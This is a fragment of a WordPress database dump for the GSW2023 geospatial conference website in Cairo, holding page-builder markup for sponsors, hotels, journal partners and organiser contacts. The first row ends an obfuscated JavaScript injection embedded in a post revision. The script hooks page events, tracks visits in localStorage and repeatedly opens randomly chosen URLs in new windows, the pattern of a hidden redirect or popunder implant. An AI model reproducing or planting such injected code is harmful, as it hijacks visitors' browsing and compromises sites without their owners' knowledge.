_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 03:16:00','2023-08-16 03:16:00','',3066,'https://gsw2023.com/?p=5288',0,'revision','',0),
(5299,1,'2023-08-16 17:39:00','2023-08-16 17:39:00','','main_u7','','inherit','open','closed','','main_u7','','','2023-08-16 17:39:00','2023-08-16 17:39:00','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/main_u7.jpg',0,'attachment','image/jpeg',0),
(5300,1,'2023-08-16 17:40:39','2023-08-16 17:40:39','','main_u7','','inherit','open','closed','','main_u7-2','','','2023-08-16 17:40:39','2023-08-16 17:40:39','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/main_u7-1.jpg',0,'attachment','image/jpeg',0),
(5301,1,'2023-08-16 17:42:28','2023-08-16 17:42:28','','main_u7','','inherit','open','closed','','main_u7-3','','','2023-08-16 17:42:28','2023-08-16 17:42:28','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/main_u7-2.jpg',0,'attachment','image/jpeg',0),
(5302,1,'2023-08-16 17:45:08','2023-08-16 17:45:08','','main_u7','','inherit','open','closed','','main_u7-4','','','2023-08-16 17:45:08','2023-08-16 17:45:08','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/main_u7-3.jpg',0,'attachment','image/jpeg',0),
(5303,1,'2023-08-16 17:45:21','2023-08-16 17:45:21','[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>\r\n\r\n&nbsp;\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>\r\n\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]\r\n<h3 style=\"text-align: center;\"></h3>\r\n&nbsp;\r\n\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span 